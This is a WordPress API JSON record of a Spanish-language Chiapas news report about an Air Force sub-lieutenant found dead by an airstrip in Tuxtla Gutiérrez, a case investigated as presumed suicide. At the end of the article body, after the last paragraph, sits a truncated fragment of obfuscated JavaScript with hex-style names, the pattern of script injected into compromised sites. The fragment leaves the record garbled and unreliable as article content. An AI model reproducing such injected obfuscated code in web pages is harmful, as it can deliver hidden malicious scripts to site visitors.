{"id":18295,"date":"2024-10-10T03:00:27","date_gmt":"2024-10-10T03:00:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18295"},"modified":"2024-10-10T03:00:28","modified_gmt":"2024-10-10T03:00:28","slug":"localizan-sin-vida-a-mando-militar-en-pista-aerea-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18295","title":{"rendered":"Localizan sin vida a mando militar en pista a\u00e9rea de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"18296\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529149498-1024x768.jpg\" alt=\"\" class=\"wp-image-18296\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529149498-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529149498-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529149498-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529149498.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"18297\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529152268-1024x768.jpg\" alt=\"\" class=\"wp-image-18297\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529152268-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529152268-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529152268-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728529152268.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 9 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la noche, fue localizado sin vida el subteniente de la Fuerza A\u00e9rea Mexicana Heriberto &#8220;N&#8221; al interior de la Regi\u00f3n A\u00e9rea en la delegaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando, el mando fue localizado sin vida a un costado de la pista A\u00e9rea n\u00famero 6 ubicada sobre la Calzada Emiliano Zapata.<\/p>\n\n\n\n<p>De manera extraoficial se dio a conocer que fue su compa\u00f1ero de guardia quien escuch\u00f3 un disparo y al ir a verificar localiz\u00f3 al subteniente tirado en el monte con manchas de sangre y a un costado un arma de fuego.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes.<\/p>\n\n\n\n<p>Sobre este caso, la l\u00ednea de investigaci\u00f3n es sobre un presunto suicidio.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el hoy occiso no ten\u00eda problemas, ni enfermedades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 9 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la noche, fue localizado sin vida el subteniente de la Fuerza A\u00e9rea Mexicana Heriberto &#8220;N&#8221; al interior de la Regi\u00f3n A\u00e9rea en la delegaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando, el mando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18296,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18295","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18295"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18295\/revisions"}],"predecessor-version":[{"id":18298,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18295\/revisions\/18298"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18296"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}